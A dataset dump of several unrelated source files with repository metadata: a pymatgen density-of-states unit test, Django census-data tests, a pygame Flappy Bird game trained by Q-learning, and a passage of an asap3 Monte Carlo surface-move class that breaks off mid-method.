def test_get_element_spd_dos(self):
# with spin polarization
energies_spin = [-11.25000, -7.50000, -3.75000, 0.00000, 3.75000, 7.50000]
fermi = 0.0
PDOS_F_2s_up = [0.00000, 0.00159, 0.00000, 0.00011, 0.00000, 0.00069]
PDOS_F_2s_down = [0.00000, 0.00159, 0.00000, 0.00011, 0.00000, 0.00069]
PDOS_F_2py_up = [0.00000, 0.00160, 0.00000, 0.25801, 0.00000, 0.00029]
PDOS_F_2py_down = [0.00000, 0.00161, 0.00000, 0.25819, 0.00000, 0.00029]
PDOS_F_2pz_up = [0.00000, 0.00161, 0.00000, 0.25823, 0.00000, 0.00029]
PDOS_F_2pz_down = [0.00000, 0.00160, 0.00000, 0.25795, 0.00000, 0.00029]
PDOS_F_2px_up = [0.00000, 0.00160, 0.00000, 0.25805, 0.00000, 0.00029]
PDOS_F_2px_down = [0.00000, 0.00161, 0.00000, 0.25814, 0.00000, 0.00029]
self.assertListEqual(
self.LobsterCompleteDOS_spin.get_element_spd_dos(el=Element("F"))[OrbitalType(0)].energies.tolist(),
energies_spin,
)
self.assertListEqual(
self.LobsterCompleteDOS_spin.get_element_spd_dos(el=Element("F"))[OrbitalType(0)]
.densities[Spin.up]
.tolist(),
PDOS_F_2s_up,
)
self.assertListEqual(
self.LobsterCompleteDOS_spin.get_element_spd_dos(el=Element("F"))[OrbitalType(0)]
.densities[Spin.down]
.tolist(),
PDOS_F_2s_down,
)
for ilistel, listel in enumerate(
self.LobsterCompleteDOS_spin.get_element_spd_dos(el=Element("F"))[OrbitalType(1)]
.densities[Spin.up]
.tolist()
):
self.assertAlmostEqual(
listel,
(np.array(PDOS_F_2px_up) + np.array(PDOS_F_2py_up) + np.array(PDOS_F_2pz_up)).tolist()[ilistel],
)
for ilistel, listel in enumerate(
self.LobsterCompleteDOS_spin.get_element_spd_dos(el=Element("F"))[OrbitalType(1)]
.densities[Spin.down]
.tolist()
):
self.assertAlmostEqual(
listel,
(np.array(PDOS_F_2px_down) + np.array(PDOS_F_2py_down) + np.array(PDOS_F_2pz_down)).tolist()[ilistel],
)
self.assertAlmostEqual(
self.LobsterCompleteDOS_spin.get_element_spd_dos(el=Element("F"))[OrbitalType(0)].efermi,
fermi,
)
# without spin polarization
energies_nonspin = [-11.25000, -7.50000, -3.75000, 0.00000, 3.75000, 7.50000]
efermi = 0.0
PDOS_F_2s = [0.00000, 0.00320, 0.00000, 0.00017, 0.00000, 0.00060]
PDOS_F_2py = [0.00000, 0.00322, 0.00000, 0.51635, 0.00000, 0.00037]
PDOS_F_2pz = [0.00000, 0.00322, 0.00000, 0.51636, 0.00000, 0.00037]
PDOS_F_2px = [0.00000, 0.00322, 0.00000, 0.51634, 0.00000, 0.00037]
self.assertListEqual(
self.LobsterCompleteDOS_nonspin.get_element_spd_dos(el=Element("F"))[OrbitalType(0)].energies.tolist(),
energies_nonspin,
)
self.assertListEqual(
self.LobsterCompleteDOS_nonspin.get_element_spd_dos(el=Element("F"))[OrbitalType(0)]
.densities[Spin.up]
.tolist(),
PDOS_F_2s,
)
for ilistel, listel in enumerate(
self.LobsterCompleteDOS_nonspin.get_element_spd_dos(el=Element("F"))[OrbitalType(1)]
.densities[Spin.up]
.tolist()
):
self.assertAlmostEqual(
listel,
(np.array(PDOS_F_2px) + np.array(PDOS_F_2py) + np.array(PDOS_F_2pz)).tolist()[ilistel],
)
self.assertAlmostEqual(
self.LobsterCompleteDOS_nonspin.get_element_spd_dos(el=Element("F"))[OrbitalType(0)].efermi,
efermi,
)
if __name__ == "__main__":
unittest.main()
|
richardtran415/pymatgen
|
pymatgen/electronic_structure/tests/test_dos.py
|
Python
|
mit
| 32,388
|
[
"pymatgen"
] |
3cfa1d1d86c57a9a8ba0cfa419410527d76c4ea0d52ff6ef928f4577a9c3218b
|
from decimal import Decimal
from django.test import TestCase
from census.meta import ACSMeta, CensusMeta, Census2010Meta
from census.datasources import Census2000, Census2010
from census.data import Value
from census.management.commands import load_census
class MockDatasource(object):
def get_value(self, table, geo_dicts):
return [0, ]
class ParsingTest(TestCase):
def test_trivial_formula(self):
from census.parse import FormulaParser
parser = FormulaParser(MockDatasource())
self.failUnlessEqual(
'P0010001',
parser.parse('P0010001').table
)
table = parser.parse('P0010001 + P0010002')
self.failUnlessEqual(table.left.table, 'P0010001')
self.failUnlessEqual(table.operation, '+')
self.failUnlessEqual(table.right.table, 'P0010002')
def test_operator_precedence(self):
from census.parse import FormulaParser
parser = FormulaParser(MockDatasource())
self.failUnlessEqual(
Value(7),
parser.parse('1 + 2 * 3')(None)
)
self.failUnlessEqual(
Value(9),
parser.parse('(1 + 2) * 3')(None)
)
def test_operations(self):
from census.parse import FormulaParser
parser = FormulaParser(MockDatasource())
self.failUnlessEqual(
Value(4),
parser.parse('2 + 2')(None)
)
self.failUnlessEqual(
Value(0),
parser.parse('2 - 2')(None)
)
self.failUnlessEqual(
Value(6),
parser.parse('2 * 3')(None)
)
self.failUnlessEqual(
Value(2),
parser.parse('4 / 2')(None)
)
def test_unicode(self):
from census.parse import FormulaParser
parser = FormulaParser(MockDatasource())
table = parser.parse(u'P049013 + P049040\r\n')
self.failUnlessEqual(
'P049013',
table.left.table
)
self.failUnlessEqual(
'P049040',
table.right.table
)
class DataTest(TestCase):
def test_moe_times_value(self):
# test that if a number with an moe is multiplied by a normal non-estimate
# number, the moe is simply multiplied but that number
a = Value(10, moe=5)
b = Value(2)
self.failUnlessEqual(
Value(20, moe=10),
a * b
)
self.failUnlessEqual(
Value(20, moe=10),
b * a
)
def test_meta_files(self):
acs_meta = ACSMeta()
self.failUnlessEqual(acs_meta.csv_column_for_matrix('B07401_001'), 6)
census_meta = CensusMeta('SF1')
self.failUnlessEqual(census_meta.csv_column_for_matrix('P001001'), 5)
census_meta = CensusMeta('SF3')
self.failUnlessEqual(census_meta.csv_column_for_matrix('P021001'), 171)
census_2010_sf1_meta = Census2010Meta('sf1')
self.failUnlessEqual(census_2010_sf1_meta.csv_column_for_matrix('P0040002'), 14)
def test_census2000_data(self):
""" Test that the data files are read properly
NOTE: It is advisable to download a locally cached copy of RI's files
(the state these tests are written for) before running, so there are no
network side-effects.
"""
return
# RI total population (2000)
cmd = load_census.Command()
cmd.handle('uSF1', 'ri')
geo = {
'FILEID': 'uSF1',
'SUMLEV': '040',
'STUSAB': 'RI',
'CHARITER': '000',
'CIFSN': '01',
'LOGRECNO': '0000001'
}
c2k = Census2000('SF1')
self.failUnlessEqual(c2k.data('P0001001', geo), Value(1048319))
def test_census2010(self):
""" Test that the data files are read properly, and that operations and
formula are handled correctly.
NOTE: It is advisable to download a locally cached copy of RI's files
(the state these tests are written for) before running, so there are no
network side-effects.
"""
# RI total population (2010)
cmd = load_census.Command()
cmd.handle('SF1ST', 'ri')
geo = {
'FILEID': 'SF1ST',
'SUMLEV': '040',
'STUSAB': 'RI',
'CHARITER': '000',
'CIFSN': '01',
'LOGRECNO': '0000001'
}
c2010sf1 = Census2010('sf1')
self.failUnlessEqual(c2010sf1.data('P00010001', geo), Value(1052567))
self.failUnlessEqual(c2010sf1.data('P00060001', geo), Value(1091043))
self.failUnlessEqual(c2010sf1.data('P00010001-P00060001', geo), Value(1052567 - 1091043))
self.failUnlessEqual(str(c2010sf1.data('P00010001/P00060001', geo).value), str(Decimal(1052567) / Decimal(1091043)))
def test_ratio_moe(self):
""" Test that MOE is calculated properly for ratios/proportions """
v1 = Value(4634, moe=989)
v2 = Value(6440, moe=1328)
result = v1 / v2
# http://www.census.gov/acs/www/Downloads/handbooks/ACSResearch.pdf
# page A-16
self.failUnlessEqual(round(result.value, 2), 0.72)
self.failUnlessEqual(round(result.moe, 4), 0.2135)
|
ProvidencePlan/Profiles
|
communityprofiles/census/tests.py
|
Python
|
mit
| 5,287
|
[
"MOE"
] |
11862958cd1524cfbc1564ea724fd265ba6ee03aa62eed0bac22918213ce36f6
|
import argparse
import math
import os
import pickle
import time
from collections import deque
from random import randint
import numpy as np
import pygame
from enum import IntEnum
from pygame.locals import *
from scipy.ndimage.filters import gaussian_filter
########################################################################################################################
parser = argparse.ArgumentParser(description='Q-Learn how to play Flappy Bird')
parser.add_argument('--actor_file', type=str, default='', help='file path to the actor file')
parser.add_argument('--save_file', type=str, default='actor.pickle',
help='file path which you would like to write to (default is actor.pickle)')
parser.add_argument('--speed', type=int, default=1, help='game speed (default 1)')
parser.add_argument('--skip_frames', type=int, default=1,
help='only allow the bird to make decisions on multiples of this frame')
parser.add_argument('--number_of_birds', type=int, default=1,
help='number of birds to play flappy bird with')
parser.add_argument('--random_start_point', type=bool, default=False,
help='use random starting point for bird(s)')
parser.add_argument('--alpha', type=float, default=.9, help='learning rate (0.0 < alpha < 1.0)')
parser.add_argument('--blur_freq', type=int, default=10,
help='the number of runs between each gaussian blur')
parser.add_argument('--sigma', type=float, default=2.0, help='sigma for guassian blur')
parser.add_argument('--bias', type=bool, default=True,
help='introduce bias in the event of ties to help the bird learn faster')
parser.add_argument('--intercede', type=bool, default=True,
help='do not allow the bird to suicide on floor/ceiling')
args = parser.parse_args()
ACTOR_FILE = args.actor_file
SAVE_FILE = args.save_file
OVERALL_SPEED = args.speed
SKIP_FRAMES = args.skip_frames
NUMBER_OF_BIRDS = args.number_of_birds
RANDOM_START_POINT = args.random_start_point
ALPHA = args.alpha
SIGMA = args.blur_freq
BLUR_FREQ = args.blur_freq
BIAS = args.bias
INTERCEDE = args.bias
########################################################################################################################
FPS = 60
ANIMATION_SPEED = 0.18 * args.speed # pixels per millisecond
WIN_WIDTH = 284 * 2 # BG image size: 284x512 px; tiled twice
WIN_HEIGHT = 512
class Bird(pygame.sprite.Sprite):
"""Represents the bird controlled by the player.
The bird is the 'hero' of this game. The player can make it climb
(ascend quickly), otherwise it sinks (descends more slowly). It must
pass through the space in between pipes (for every pipe passed, one
point is scored); if it crashes into a pipe, the game ends.
Attributes:
x: The bird's X coordinate.
y: The bird's Y coordinate.
msec_to_climb: The number of milliseconds left to climb, where a
complete climb lasts Bird.CLIMB_DURATION milliseconds.
Constants:
WIDTH: The width, in pixels, of the bird's image.
HEIGHT: The height, in pixels, of the bird's image.
SINK_SPEED: With which speed, in pixels per millisecond, the bird
descends in one second while not climbing.
CLIMB_SPEED: With which speed, in pixels per millisecond, the bird
ascends in one second while climbing, on average. See also the
Bird.update docstring.
CLIMB_DURATION: The number of milliseconds it takes the bird to
execute a complete climb.
"""
WIDTH = HEIGHT = 32
SINK_SPEED = 0.18 * OVERALL_SPEED
CLIMB_SPEED = 0.3 * OVERALL_SPEED
CLIMB_DURATION = 333.3 / OVERALL_SPEED
def __init__(self, x, y, msec_to_climb, images):
"""Initialise a new Bird instance.
Arguments:
x: The bird's initial X coordinate.
y: The bird's initial Y coordinate.
msec_to_climb: The number of milliseconds left to climb, where a
complete climb lasts Bird.CLIMB_DURATION milliseconds. Use
this if you want the bird to make a (small?) climb at the
very beginning of the game.
images: A tuple containing the images used by this bird. It
must contain the following images, in the following order:
0. image of the bird with its wing pointing upward
1. image of the bird with its wing pointing downward
"""
super(Bird, self).__init__()
self.x, self.y = x, y
self.msec_to_climb = msec_to_climb
self._img_wingup, self._img_wingdown = images
self._mask_wingup = pygame.mask.from_surface(self._img_wingup)
self._mask_wingdown = pygame.mask.from_surface(self._img_wingdown)
self.dead = False
def update(self, delta_frames=1):
"""Update the bird's position.
This function uses the cosine function to achieve a smooth climb:
In the first and last few frames, the bird climbs very little, in the
middle of the climb, it climbs a lot.
One complete climb lasts CLIMB_DURATION milliseconds, during which
the bird ascends with an average speed of CLIMB_SPEED px/ms.
This Bird's msec_to_climb attribute will automatically be
decreased accordingly if it was > 0 when this method was called.
Arguments:
delta_frames: The number of frames elapsed since this method was
last called.
"""
if self.msec_to_climb > 0:
frac_climb_done = 1 - self.msec_to_climb / Bird.CLIMB_DURATION
self.y -= (Bird.CLIMB_SPEED * frames_to_msec(delta_frames) *
(1 - math.cos(frac_climb_done * math.pi)))
self.msec_to_climb -= frames_to_msec(delta_frames)
else:
self.y += Bird.SINK_SPEED * frames_to_msec(delta_frames)
@property
def image(self):
"""Get a Surface containing this bird's image.
This will decide whether to return an image where the bird's
visible wing is pointing upward or where it is pointing downward
based on pygame.time.get_ticks(). This will animate the flapping
bird, even though pygame doesn't support animated GIFs.
"""
if pygame.time.get_ticks() % 500 >= 250:
return self._img_wingup
else:
return self._img_wingdown
@property
def mask(self):
"""Get a bitmask for use in collision detection.
The bitmask excludes all pixels in self.image with a
transparency greater than 127."""
if pygame.time.get_ticks() % 500 >= 250:
return self._mask_wingup
else:
return self._mask_wingdown
@property
def rect(self):
"""Get the bird's position, width, and height, as a pygame.Rect."""
return Rect(self.x, self.y, Bird.WIDTH, Bird.HEIGHT)
def jump(self):
self.msec_to_climb = Bird.CLIMB_DURATION
class PipePair(pygame.sprite.Sprite):
"""Represents an obstacle.
A PipePair has a top and a bottom pipe, and only between them can
the bird pass -- if it collides with either part, the game is over.
Attributes:
x: The PipePair's X position. This is a float, to make movement
smoother. Note that there is no y attribute, as it will only
ever be 0.
image: A pygame.Surface which can be blitted to the display surface
to display the PipePair.
mask: A bitmask which excludes all pixels in self.image with a
transparency greater than 127. This can be used for collision
detection.
top_pieces: The number of pieces, including the end piece, in the
top pipe.
bottom_pieces: The number of pieces, including the end piece, in
the bottom pipe.
Constants:
WIDTH: The width, in pixels, of a pipe piece. Because a pipe is
only one piece wide, this is also the width of a PipePair's
image.
PIECE_HEIGHT: The height, in pixels, of a pipe piece.
ADD_INTERVAL: The interval, in milliseconds, in between adding new
pipes.
"""
WIDTH = 80
PIECE_HEIGHT = 32
ADD_INTERVAL = 3000 / OVERALL_SPEED
def __init__(self, pipe_end_img, pipe_body_img):
"""Initialises a new random PipePair.
The new PipePair will automatically be assigned an x attribute of
float(WIN_WIDTH - 1).
Arguments:
pipe_end_img: The image to use to represent a pipe's end piece.
pipe_body_img: The image to use to represent one horizontal slice
of a pipe's body.
"""
self.passed = set()
self.x = float(WIN_WIDTH - 1)
self.score_counted = set()
self.image = pygame.Surface((PipePair.WIDTH, WIN_HEIGHT), SRCALPHA)
self.image.convert() # speeds up blitting
self.image.fill((0, 0, 0, 0))
total_pipe_body_pieces = int(
(WIN_HEIGHT - # fill window from top to bottom
3 * Bird.HEIGHT - # make room for bird to fit through
3 * PipePair.PIECE_HEIGHT) / # 2 end pieces + 1 body piece
PipePair.PIECE_HEIGHT # to get number of pipe pieces
)
self.bottom_pieces = randint(1, total_pipe_body_pieces)
self.top_pieces = total_pipe_body_pieces - self.bottom_pieces
# bottom pipe
for i in range(1, self.bottom_pieces + 1):
piece_pos = (0, WIN_HEIGHT - i * PipePair.PIECE_HEIGHT)
self.image.blit(pipe_body_img, piece_pos)
bottom_pipe_end_y = WIN_HEIGHT - self.bottom_height_px
self.bottom_pipe_end_y = bottom_pipe_end_y
bottom_end_piece_pos = (0, bottom_pipe_end_y - PipePair.PIECE_HEIGHT)
self.image.blit(pipe_end_img, bottom_end_piece_pos)
# top pipe
for i in range(self.top_pieces):
self.image.blit(pipe_body_img, (0, i * PipePair.PIECE_HEIGHT))
top_pipe_end_y = self.top_height_px
self.top_pipe_end_y = top_pipe_end_y
self.image.blit(pipe_end_img, (0, top_pipe_end_y))
# compensate for added end pieces
self.top_pieces += 1
self.bottom_pieces += 1
# for collision detection
self.mask = pygame.mask.from_surface(self.image)
@property
def top_height_px(self):
"""Get the top pipe's height, in pixels."""
return self.top_pieces * PipePair.PIECE_HEIGHT
@property
def bottom_height_px(self):
"""Get the bottom pipe's height, in pixels."""
return self.bottom_pieces * PipePair.PIECE_HEIGHT
@property
def visible(self):
"""Get whether this PipePair on screen, visible to the player."""
return -PipePair.WIDTH < self.x < WIN_WIDTH
@property
def rect(self):
"""Get the Rect which contains this PipePair."""
return Rect(self.x, 0, PipePair.WIDTH, PipePair.PIECE_HEIGHT)
def update(self, delta_frames=1):
"""Update the PipePair's position.
Arguments:
delta_frames: The number of frames elapsed since this method was
last called.
"""
self.x -= ANIMATION_SPEED * frames_to_msec(delta_frames)
def collides_with(self, bird):
"""Get whether the bird collides with a pipe in this PipePair.
Arguments:
bird: The Bird which should be tested for collision with this
PipePair.
"""
return pygame.sprite.collide_mask(self, bird)
def load_images():
"""Load all images required by the game and return a dict of them.
The returned dict has the following keys:
background: The game's background image.
bird-wingup: An image of the bird with its wing pointing upward.
Use this and bird-wingdown to create a flapping bird.
bird-wingdown: An image of the bird with its wing pointing downward.
Use this and bird-wingup to create a flapping bird.
pipe-end: An image of a pipe's end piece (the slightly wider bit).
Use this and pipe-body to make pipes.
pipe-body: An image of a slice of a pipe's body. Use this and
pipe-body to make pipes.
"""
def load_image(img_file_name):
"""Return the loaded pygame image with the specified file name.
This function looks for images in the game's images folder
(./images/). All images are converted before being returned to
speed up blitting.
Arguments:
img_file_name: The file name (including its extension, e.g.
'.png') of the required image, without a file path.
"""
file_name = os.path.join('.', 'images', img_file_name)
img = pygame.image.load(file_name)
img.convert()
return img
return {'background': load_image('background.png'),
'pipe-end': load_image('pipe_end.png'),
'pipe-body': load_image('pipe_body.png'),
# images for animating the flapping bird -- animated GIFs are
# not supported in pygame
'bird-wingup': load_image('bird_wing_up.png'),
'bird-wingdown': load_image('bird_wing_down.png')}
def frames_to_msec(frames, fps=FPS):
"""Convert frames to milliseconds at the specified framerate.
Arguments:
frames: How many frames to convert to milliseconds.
fps: The framerate to use for conversion. Default: FPS.
"""
return 1000.0 * frames / fps
def msec_to_frames(milliseconds, fps=FPS):
"""Convert milliseconds to frames at the specified framerate.
Arguments:
milliseconds: How many milliseconds to convert to frames.
fps: The framerate to use for conversion. Default: FPS.
"""
return fps * milliseconds / 1000.0
class Action(IntEnum):
STILL = 0
JUMP = 1
step_r = 3
step_c = 3
actions = 2
height = int((WIN_HEIGHT / step_r) * 2) + 1
width = int(((WIN_WIDTH / step_c) * 2) + PipePair.WIDTH) + 1
bird_heights = 3
pipe_heights = 3
is_jumping = 2
dimensions = (actions, height, width, bird_heights, pipe_heights, is_jumping)
Q = np.full(dimensions, 0, dtype=np.float32)
V = np.full(dimensions, 1, dtype=np.int)
def get_state(actor):
top_y = actor.next_pipe.top_pieces * PipePair.PIECE_HEIGHT
bottom_y = WIN_HEIGHT - actor.next_pipe.bottom_pieces * PipePair.PIECE_HEIGHT
delta_y = int(((top_y + bottom_y) / 2) - actor.bird.y)
delta_x = int((actor.next_pipe.x + PipePair.WIDTH) - actor.bird.x)
bird_lmh = int(actor.bird.y / (WIN_HEIGHT / 3))
pipe_lmh = int(((top_y + bottom_y) / 2) / (WIN_HEIGHT / 3))
is_jumping = int(actor.bird.msec_to_climb > 0)
bird_lmh = min(bird_lmh, 2)
return delta_y, delta_x, bird_lmh, pipe_lmh, is_jumping
class Actor:
def __init__(self, bird):
self.bird = bird
self.last_state = None
self.action = None
self.done = False
self.next_pipe = None
self.pipes_passed = 0
def act(self, state):
# Consult the Q matrix and pick the action that has the highest
state = self._state_index(state)
still_state = (Action.STILL,) + state
jump_state = (Action.JUMP,) + state
jump = Q[jump_state] + float(8 / V[jump_state])
still = Q[still_state] + float(8 / V[still_state])
if jump > still:
action = Action.JUMP
elif still > jump:
action = Action.STILL
else:
if BIAS:
bottom_y = WIN_HEIGHT - self.next_pipe.bottom_pieces * PipePair.PIECE_HEIGHT
top_y = self.next_pipe.top_pieces * PipePair.PIECE_HEIGHT
bird_lmh = int(self.bird.y / (WIN_HEIGHT / 3))
pipe_lmh = int(((top_y + bottom_y) / 2) / (WIN_HEIGHT / 3))
if bird_lmh > pipe_lmh:
action = Action.JUMP
elif bird_lmh < pipe_lmh:
action = Action.STILL
else:
action = Action.STILL
else:
if V[jump_state] < V[still_state]:
return Action.JUMP
else:
return Action.STILL
if INTERCEDE:
# Intercede on the bird's behalf to stop it from dying.
if (self.bird.y - Bird.CLIMB_DURATION * Bird.CLIMB_SPEED) <= 0:
action = Action.STILL
if self.bird.y + (Bird.SINK_SPEED * SKIP_FRAMES * frames_to_msec(1)) >= WIN_HEIGHT - self.bird.HEIGHT:
action = Action.JUMP
V[(action,) + state] += 1
if action == Action.JUMP:
self.bird.jump()
return action
def learn(self, old_state, new_state, action, reward):
# Consult the matrix and adjust the value at the appropriate position
old = (action,) + (self._state_index(old_state))
new = (self._state_index(new_state))
y, x, bird_lmh, pipe_lmh, is_jumping = new
max_value = max(Q[:, y, x, bird_lmh, pipe_lmh, is_jumping])
Q[old] = (1 - ALPHA) * Q[old] + ALPHA * (reward + max_value)
@staticmethod
def _state_index(state):
"""
Provided a state in the form (delta_y, delta_x, bird_lmh, pipe_lmh, is_flapping) will return the adjusted forms
of these states such that they can be used as indecies.
"""
delta_y, delta_x, bird_lmh, pipe_lmh, is_flapping = state
actions, height, width, _, _, _ = Q.shape
y = int((height / 2) + (delta_y / step_r) - 1)
x = int((width / 2) + (delta_x / step_c) - 1)
return y, x, bird_lmh, pipe_lmh, is_flapping
def main():
global Q, V
pygame.init()
display_surface = pygame.display.set_mode((WIN_WIDTH, WIN_HEIGHT))
pygame.display.set_caption('Pygame Flappy Bird')
clock = pygame.time.Clock()
score_font = pygame.font.SysFont(None, 32, bold=True) # default font
images = load_images()
# the bird stays in the same x position, so bird.x is a constant
# center bird on screen
if not ACTOR_FILE == '':
if os.path.exists(ACTOR_FILE):
print('Reading actor from file.')
with open(ACTOR_FILE, 'rb') as handle:
Q, V = pickle.load(handle)
else:
print(ACTOR_FILE, 'does not exist.')
score = 0.0
runs = 0.0
max_pipes_passed = 0
pipes_passed = 0
while True:
runs += 1
if runs % BLUR_FREQ == 0:
Q = gaussian_filter(Q, sigma=SIGMA)
print('{0:15}: AVERAGE_PIPES: {1:>15.2f} \t RUN_PIPES: {3:>5} \t OVERALL: {2:>5}'.format(int(runs), (
(score / runs) / NUMBER_OF_BIRDS), max_pipes_passed, pipes_passed))
birds = []
for b in range(NUMBER_OF_BIRDS):
x = 50
if RANDOM_START_POINT:
y = randint(Bird.HEIGHT, WIN_HEIGHT - 100)
else:
y = int(WIN_HEIGHT / 2 - Bird.HEIGHT / 2)
birds.append(Actor(Bird(x, y, 2, (images['bird-wingup'], images['bird-wingdown']))))
pipes = deque()
frame_clock = 0 # this counter is only incremented if the game isn't paused
done = paused = False
while not done:
clock.tick(FPS)
# Handle this 'manually'. If we used pygame.time.set_timer(),
# pipe addition would be messed up when paused.
if not (paused or frame_clock % msec_to_frames(PipePair.ADD_INTERVAL)):
pp = PipePair(images['pipe-end'], images['pipe-body'])
pipes.append(pp)
for actor_bird in birds:
actor_bird.next_pipe = pipes[0]
if len(pipes) > 1 and (actor_bird.next_pipe.x + PipePair.WIDTH) - actor_bird.bird.x < 0:
actor_bird.next_pipe = pipes[1]
for e in pygame.event.get():
if e.type == QUIT or (e.type == KEYUP and e.key == K_ESCAPE):
done = True
break
elif e.type == KEYUP and e.key in (K_PAUSE, K_p):
paused = not paused
elif e.type == KEYUP and e.key is K_s:
print('{}- Writing actor to file'.format(time.strftime("%I:%M:%S")))
with open(SAVE_FILE, 'wb') as handle:
pickle.dump((Q, V), handle)
elif e.type == MOUSEBUTTONUP or (e.type == KEYUP and e.key in (K_UP, K_RETURN, K_SPACE)):
for actor_bird in birds:
actor_bird.bird.jump()
if paused:
continue
for actor_bird in birds:
if actor_bird.last_state is None:
actor_bird.last_state = get_state(actor_bird)
if frame_clock % SKIP_FRAMES == 0:
for actor_bird in birds:
if not actor_bird.bird.dead:
actor_bird.action = actor_bird.act(actor_bird.last_state)
# check for collisions
all_dead = True
for actor_bird in birds:
bird = actor_bird.bird
pipe_collision = any(p.collides_with(bird) for p in pipes)
if pipe_collision or 0 >= bird.y or bird.y >= WIN_HEIGHT - Bird.HEIGHT:
bird.dead = True
if not bird.dead:
all_dead = False
pipes_passed = 0
if all_dead:
done = True
for bird_actor in birds:
pipes_passed = max(pipes_passed, bird_actor.pipes_passed)
max_pipes_passed = max(max_pipes_passed, bird_actor.pipes_passed)
for x in (0, WIN_WIDTH / 2):
display_surface.blit(images['background'], (x, 0))
while pipes and not pipes[0].visible:
pipes.popleft()
for p in pipes:
p.update()
display_surface.blit(p.image, p.rect)
for actor_bird in birds:
actor_bird.bird.update()
bird = actor_bird.bird
if frame_clock % SKIP_FRAMES == 0 or bird.dead:
state = get_state(actor_bird)
delta_y, delta_x, bird_lmh, pipe_lmh, is_jumping = state
distance_to_pipe = math.hypot(delta_x, delta_y)
reward = 0.0
if not actor_bird.done:
if not bird.dead:
reward += 1.0 + (15.0 / (distance_to_pipe + .1))
if (pipes[0].x + PipePair.WIDTH) - bird.x < 0 and id(bird) not in pipes[0].passed:
actor_bird.pipes_passed += 1
pipes[0].passed |= {id(bird)}
reward += 10000.0
if bird.dead:
reward -= 1000.0 + (.5 * distance_to_pipe)
if bird.y <= 0 or bird.y > 485:
reward -= 10000.0
actor_bird.learn(actor_bird.last_state, state, actor_bird.action, reward)
if bird.dead:
actor_bird.done = True
actor_bird.last_state = state
if not bird.dead:
display_surface.blit(bird.image, bird.rect)
# update and display score
for p in pipes:
for actor_bird in birds:
bird = actor_bird.bird
if not bird.dead:
if p.x + PipePair.WIDTH < bird.x and bird not in p.score_counted:
p.score_counted |= {bird}
score += 1
for actor_bird in birds:
pipes_passed = max(pipes_passed, actor_bird.pipes_passed)
score_surface = score_font.render(str(pipes_passed), True, (255, 255, 255))
score_x = WIN_WIDTH / 2 - score_surface.get_width() / 2
display_surface.blit(score_surface, (score_x, PipePair.PIECE_HEIGHT))
pygame.display.flip()
frame_clock += 1
print('Game over! Score: %i' % score)
pygame.quit()
if __name__ == '__main__':
main()
|
EthanWelsh/Flappy-Bird
|
flappybird.py
|
Python
|
mit
| 24,151
|
[
"Gaussian"
] |
cd48fc53f1c7e04e7b6c842de322038798700342992a3dd154f8d88e025f9024
|
import numpy as np
from asap3 import FullNeighborList
from asap3.MonteCarlo.Moves.Data import lattice as latticedata
from asap3.MonteCarlo.Moves.Base import Move, RandChoice
from ase.cluster.cluster import Cluster
class SurfaceMove(Move):
def __init__(self, debug=0):
self.debug = debug
self.surface_i = -1
self.vacant_i = -1
Move.__init__(self)
def set_atoms(self, atoms):
Move.set_atoms(self, atoms)
if not isinstance(atoms, Cluster):
raise Warning('The cluster is not a valid Cluster instance.')
if atoms.symmetry != 'fcc':
raise Warning('Can only work with fcc structures.')
self.natoms = len(atoms)
# Get the structual parameters
sym = atoms.symmetry
self.neighbor_positions = (latticedata[sym]['neighbor_positions'] *
atoms.lattice_basis[0, 0])
self.neighbor_cutoff = (latticedata[sym]['neighbor_cutoff'] *
atoms.lattice_basis[0, 0])
self.neighbor_numbers = latticedata[sym]['neighbor_numbers']
self.neighbor_mapping = latticedata[sym]['neighbor_mapping']
self.neighbor_count = latticedata[sym]['neighbor_count']
self.type_count = latticedata[sym]['type_count']
self.type_names = latticedata[sym]['type_names']
self.type_numbers = latticedata[sym]['type_numbers']
self.type_data = latticedata[sym]['type_data']
# Set neighbors, coordination and type for all atoms
get_neighbors = FullNeighborList(self.neighbor_cutoff, atoms)
positions = atoms.get_positions()
neighbors = []
coordinations = []
types = []
for i, pos in enumerate(positions):
nl = get_neighbors[i]
dl = (positions[nl] - pos) / atoms.lattice_basis[0, 0]
neighbors.append([-1] * self.neighbor_count)
for n, d in zip(nl, dl):
name = tuple(d.round(1))
if name in self.neighbor_numbers:
neighbors[i][self.neighbor_numbers[name]] = n
coordinations.append(self.get_atom_coordination(neighbors[i]))
types.append(self.get_atom_type(neighbors[i]))
self.positions = positions
self.neighbors = np.array(neighbors, dtype=int)
self.coordinations = np.array(coordinations, dtype=int)
self.types = np.array(types, dtype=int)
# Generate vacancies (position, neighbors, coordination and type)
self.vacant_positions = np.zeros((0, 3), dtype=float)
self.vacant_neighbors = np.zeros((0, self.neighbor_count), dtype=int)
self.vacant_coordinations = np.zeros(0, dtype=int)
self.vacant_types = np.zeros(0, dtype=int)
for i in self.surface_indexes():
self.add_vacancies(self.positions[i], self.neighbors[i], i)
if self.debug > 2:
if self.check_vacancies():
raise Warning('Something is wrong, read the message above')
def __call__(self, atoms):
self.chose()
self.backup(self.surface_i)
atoms[self.surface_i].position = self.vacant_positions[self.vacant_i].copy()
def chose(self):
# Choose a surface atom to move and where to move it
surface_i = RandChoice(self.surface_indexes())
self_neighbor = True
while self_neighbor:
vacant_i = RandChoice(self.vacant_indexes())
# The atom must not move to a site where its only neighbor is it self
# If just one other neighbor is found then its fine => break
for n in self.vacant_neighbors[vacant_i]:
if n != -1 and n != surface_i:
self_neighbor = False
break
self.surface_i = surface_i
self.vacant_i = vacant_i
def accept(self):
# Save the old position, neighbors, type and coordination
old_position = self.positions[self.surface_i].copy()
old_neighbors = self.neighbors[self.surface_i].copy()
old_coordination = self.coordinations[self.surface_i].copy()
old_type = self.types[self.surface_i].copy()
# Set the position, neighbors, type and coordination
new_position = self.vacant_positions[self.vacant_i].copy()
new_neighbors = self.vacant_neighbors[self.vacant_i].copy()
new_coordination = self.vacant_coordinations[self.vacant_i].copy()
new_type = self.vacant_types[self.vacant_i].copy()
self.positions[self.surface_i] = new_position
self.neighbors[self.surface_i] = new_neighbors
self.coordinations[self.surface_i] = new_coordination
self.types[self.surface_i] = new_type
# Add "surface_i" in the new neighbors neighborlists
for j, n in enumerate(new_neighbors):
if n >= 0 and n != self.surface_i:
self.neighbors[n][self.neighbor_mapping[j]] = self.surface_i
self.coordinations[n] += 1
self.types[n] = self.get_atom_type(self.neighbors[n])
elif n == self.surface_i:
self.neighbors[n][j] = -1
self.coordinations[n] -= 1
self.types[n] = self.get_atom_type(self.neighbors[n])
# Set "-1" in the old neighbors neighborlists
for j, n in enumerate(old_neighbors):
if n >= 0:
self.neighbors[n][self.neighbor_mapping[j]] = -1
